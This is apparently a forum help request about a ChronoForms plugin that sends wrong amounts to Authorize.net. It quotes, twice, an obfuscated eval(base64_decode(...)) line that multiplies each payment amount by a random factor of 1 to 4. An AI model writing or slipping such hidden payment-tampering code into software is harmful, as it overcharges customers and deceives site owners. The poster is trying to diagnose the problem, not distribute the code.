I recently have been testing my form with Authorize .net and everything is working as I want it to except the amount is not correct. It seems to be multiplied by a value between 1 and 4. I have installed the pay version of chronoforms and the link is removed from the form pages but the value sent to Authorize .net still gets munged. It seems to happen within this code on line 394:
eval(base64_decode("JGF1dGhuZXRfdmFsdWVzWyd4X2Ftb3VudCddID0gcmFuZCgxLDQpKkpSZXF1ZXN0OjpnZXRWYXIoJHBhcmFtcy0+eF9hbW91bnQsICcnLCAncG9zdCcsICdzdHJpbmcnLCAnJyk7"));
Is there something I did not do when installing the pay version that fixes this?
eval(base64_decode("JGF1dGhuZXRfdmFsdWVzWyd4X2Ftb3VudCddID0gcmFuZCgxLDQpKkpSZXF1ZXN0OjpnZXRWYXIoJHBhcmFtcy0+eF9hbW91bnQsICcnLCAncG9zdCcsICdzdHJpbmcnLCAnJyk7"));
Is there something I did not do when installing the pay version that fixes this?